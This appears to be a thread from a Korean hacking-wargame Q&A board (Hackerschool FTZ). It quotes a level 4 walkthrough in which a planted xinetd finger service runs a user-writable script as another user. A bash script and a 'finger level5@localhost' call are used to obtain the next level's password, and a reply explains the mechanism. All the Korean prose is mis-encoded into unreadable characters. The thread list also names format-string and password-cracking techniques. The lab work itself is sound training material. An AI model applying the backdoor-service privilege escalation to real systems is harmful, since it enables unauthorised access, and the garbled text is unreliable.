·¹º§ ÇØÅ·

 2844, 4/143 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   o-0_o-0
   [re] ·¹º§4.. ÀÌÇØ°¡¾È°¡¿ä..¤Ñ¤Ñ¤»

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=654 [º¹»ç]



>[level4@ftz level4]$ cat hint
>
>
>´©±º°¡ /etc/xinetd.d/¿¡ ¹éµµ¾î¸¦ ½É¾î³õ¾Ò´Ù.!
>
>
>[level4@ftz level4]$ cd /etc/xinetd.d
>[level4@ftz xinetd.d]$ ls -al
>total 60
>drwxr-xr-x    2 root     root         4096 Aug  5 23:50 .
>drwxr-xr-x   51 root     root         4096 Oct 24 08:46 ..
>-rw-r--r--    1 root     root          171 Mar 28  2003 backdoor
>-rw-r--r--    1 root     root          295 Mar 28  2003 chargen
>-rw-r--r--    1 root     root          315 Mar 28  2003 chargen-udp
>-rw-r--r--    1 root     root          295 Mar 28  2003 daytime
>-rw-r--r--    1 root     root          315 Mar 28  2003 daytime-udp
>-rw-r--r--    1 root     root          287 Mar 28  2003 echo
>-rw-r--r--    1 root     root          306 Mar 28  2003 echo-udp
>-rw-r--r--    1 root     root          312 Mar 28  2003 servers
>-rw-r--r--    1 root     root          310 Mar 28  2003 services
>-rw-r--r--    1 root     root          406 Mar 28  2003 sgi_fam
>-rw-r--r--    1 root     root          302 Mar 28  2003 telnet
>-rw-r--r--    1 root     root          319 Mar 28  2003 time
>-rw-r--r--    1 root     root          315 Mar 28  2003 time-udp
>[level4@ftz xinetd.d]$ cat backdoor
>service finger
>{
>        disable = no
>        flags           = REUSE
>        socket_type     = stream
>        wait            = no
>        user            = level5
>        server          = /home/level4/tmp/backdoor
>        log_on_failure  += USERID
>}
>[level4@ftz xinetd.d]$ cd /home/level4/tmp
>[level4@ftz tmp]$ ls -al
>total 8
>drwxrwxr-x    2 root     level4       4096 Oct 27 19:20 .
>drwxr-xr-x    4 root     level4       4096 May  7  2002 ..
>[level4@ftz tmp]$ vi backdoor
>#!/bin/bash
>my-pass
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>:wq
>"backdoor" [New] 2L, 20C written
>[level4@ftz tmp]$ ls -al
>total 12
>drwxrwxr-x    2 root     level4       4096 Oct 27 19:41 .
>drwxr-xr-x    4 root     level4       4096 May  7  2002 ..
>-rw-rw-r--    1 level4   level4         20 Oct 27 19:41 backdoor
>[level4@ftz tmp]$ finger level5@localhost
>Broken pipe
>[level4@ftz tmp]$
>
>------------------------------------------------------------
>
>ÀÌ°Ç 밎¿¡ ¾î¶²ºÐÀÌ ¾²½Å±ÛÁÙ ÀϺκÐÀÔ´Ï´Ù.
>
>À̰ɺ¸°í ´ëÃæµû¶óÇϴϱî. ·¹º§5Æнº¿öµå°¡ º¸ÀÌ´õ±º¿ä..
>
>±Ùµ¥ »ý°¢À»ÇغÁµµ ¾î¶±ÄÉÇؼ­ Æнº¿öµå¸¦ ¾ò¾î³Á´ÂÁö..ÀÌÇØ°¡¾È°©´Ï´Ù.
>
>¾î¶²¿ø¸®Àΰ¡¿ä~?
>
>±Ã±ÝÇعÌÄ¡°Ù¾î¿ä..TT
>


´ÔÀÇ ±ÛÀÇ ³»¿ëÁß
service finger
{
        disable = no
        flags           = REUSE
        socket_type     = stream
        wait            = no
        user            = level5
        server          = /home/level4/tmp/backdoor
        log_on_failure  += USERID
}
ÀÌ·¸°Ô ÀÖ½À´Ï´Ù,
ÀÌ°Ô ¹éµµ¾î ¼³Á¤ ÆÄÀÏÀ̶ó°í º¸½Ã¸é µË´Ï´Ù

Àú±â À§¿¡ º¸¸é fingerÆ÷Æ®¸¦ »ç¿ëÇϴ°ÍÀ» ¾Ë¼ö ÀÖ½À´Ï´Ù
´Ù¸¥°Ç ¸ô¶óµµ µÇ°í ÀÚ¼¼È÷ º¸¸é
user ¶õ¿¡´Â level5 sever ¶õ¿¡´Â /home/level4/tmp/backdoor
±×¸®±¸ log_on_failure ¿¡´Â USERID ¶ó°í ½áÀÖ½À´Ï´Ù

¶æÀ» Çؼ®Çغ¸ÀÚ¸é fingerÆ÷Æ®·Î Á¢¼ÓÇÏ¸é ·Î±×ÀΰúÁ¤ ¾øÀÌ level5¶ó´Â ±ÇÇÑÀÌ ÁÖ¾îÁøÈÄ /home/level5/tmp/backdoor ¶ó´Â ÇÁ·Î±×·¥À» ½ÇÇàÇÕ´Ï´Ù,

±×·¡¼­ cd /home/level5/tmp/·Î °£´ÙÀ½¿¡ backdoor¶ó´Â ÇÁ·Î±×·¥À» ÀÛ¼ºÇÑ°ÍÀÔ´Ï´Ù
ÀÌ backdoor´Â ½©½ºÅ©¸³Æ®·Î ÀÛ¼ºµÇ¾îÀÖ±¸ ½©½ºÅ©¸³Æ®´Â Ç×»ó
#!/bin/bash ·Î ½ÃÀÛÇÕ´Ï´Ù
³»¿ëÀ»º¸¸é my-passÀΰɺ¸¾Æ ºñ¹øÀ» Ãâ·ÂÇØÁÖ´Â ÇÁ·Î±×·¥À̶ó´Â ¾Ë¼ö ÀÖ½À´Ï´Ù,
±×¸®±¸ ÇÁ·Î±×·¥À» ¸¸µçÈÄ  chomd·Î ´Ù¸¥»ç¶÷¿¡°Ôµµ ½ÇÇà±ÇÇÑÀ» ÁÖ¾î¾ß ÇÕ´Ï´Ù
¿Ö³ÄÇϸé backdoor¶ó´Â ÇÁ·Î±×·¥Àº ³ª(level4)°¡ ÀÛ¼ºÇÏÁö¸¸ ÇÁ·Î±×·¥À» ½ÇÇàÇÏ´Â finger´Â level5ÀÇ ±ÇÇÑÀ¸·Î ÀÛµ¿Çϱ⠶§¹®ÀÔ´Ï´Ù

±×¸®±¸ fingerÀÇ »ç¿ë¹ýÀº finger À¯Àú³×ÀÓ@¾ÆÀÌÇÇÁÖ¼Ò ÀÔ´Ï´Ù
±Ùµ¥ localhost´Â ÀÚ±âÀÚ½ÅÀ» °¡¸£Å°´Â ¾ÆÀÌÇÇ·Î ÇØÄ¿½ºÄð¿¡¼­ fingerµµ µ¹¸®°í ¹Þ°í Çϱ⶧¹®¿¡ ÀÚ±âÀÚ½ÅÀ» °¡¸£Å°´Â localhost¶ó°í ÃľßÇÕ´Ï´Ù,
¹°·Ð ftzÀÇ ¾ÆÀÌÇÇÁÖ¼Ò³ª, ftz.hackerschool.org¶ó°í Ãĵµ µË´Ï´Ù

  Hit : 3984     Date : 2003/11/22 06:58



    
abcboy chmod 2005/03/18  
2784     level20 / FSB¸¦ ÀÌ¿ëÇÏ¿© .dtors(destructor) ¿µ¿ªÀ» ¼öÁ¤ÇÏ¿©, RTL±â¹ýÀ¸·Î execlÇÔ¼ö¸¦ ½ÇÇàÇÏ¿© ½© ½ÇÇàÇϱâ.[3]     pogusm
11/30 4121
2783     [re] level4 ¿¡¼­ ³­°¨ÇÕ´Ï´Ù. ;;[1]     007mr
09/13 4117
2782   level1 ÆÄÀÏ ¸øã°Ú¾î¿ä[5]     kdhkdh99
08/30 4099
2781   ·¹º§10 ¿¡¼­ ÀÌ ¼Ò½º Á» ºÎÁ·ÇÑÁ¡...[9]     3cushion
10/04 4089
2780   À̹ø¿£ ·¹º§5 ÈùÆ®~[4]     kokikoki
10/05 4087
2779     [re] ftz »ç¿ëÀÚ °³°³ÀÎÀÇ Ã¥ÀÓÀÔ´Ï´Ù.[7]     indra
01/14 4068
2778   ·¹º¥8Àä,, Á¸´õ¸®ÆÛ·Î ½¦µµ¿ì ÆÄÀÏ Å©·¢ÇÏ´Â ¹æ¹ýÁ» ¾Ë·ÁÁÖ¼¼¿ä[15]     manas
09/23 4043
2777   [Áú¹®]find / -user root 2>/dev/null[1]     kijibe
09/04 4011
2776   ·¹º§4¿¡¼­     3cushion
09/10 3988
2775     [re] ·¹º§2 Àε¥¿ä »ó´çÈ÷ Èûµå³×¿ä ¤Ñ¤Ñ;;[2]     h4ker
09/03 3988
    [re] ·¹º§4.. ÀÌÇØ°¡¾È°¡¿ä..¤Ñ¤Ñ¤»[1]     o-0_o-0
11/22 3983
2773   level1 ÈùÆ®?....[3]     bigfood
09/10 3980
2772   LOB FC4 enigma ÈùÆ® Á» ÁÖ¼¼¿ä     ¿ìÀ×22
05/17 3977
2771   level2 ÈùÆ®?....[3]     bigfood
09/10 3965
2770   ¿¡±×½© ¾È¾²°í ftz bof¹®Á¦ ´Ù Ǫ½ÅºÐ ã½À´Ï´Ù...[4]     lMaxl04
05/17 3954
2769   level 4 ÁøÇàÁß¿¡.. ¿ÏÀü ¾îÀ̾ø¾î¿ä¤»¤» ÀÌ°Å ¾î¶»°Ô ÇØ°áÇÏÁÒ?[5]     -ÄÚ³­
10/22 3950
2768   level1 cat /bin/ExcuteMe Áú¹®ÀÌ¿ä[3]     dhvms99
09/06 3941
2767   ¿ö°ÔÀÓ Á¢ÇÒ ¼ö ÀÖ´Â »çÀÌÆ® ¾Ë·ÁÁÖ¼¼¿ä.[2]     ¿À¼Ò¸®
02/23 3936
2766   F.T.Z ftp¼­¹ö¿¡ Á¢¼ÓÀ̾ȵǿä..[2]     0bliss0
09/15 3933
2765     [re] ·¹º§ 4¿¡¼­ finger¿¡ ´ëÇؼ­.....[5]     muzen2540
09/15 3927
[1][2][3] 4 [5][6][7][8][9][10]..[143]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org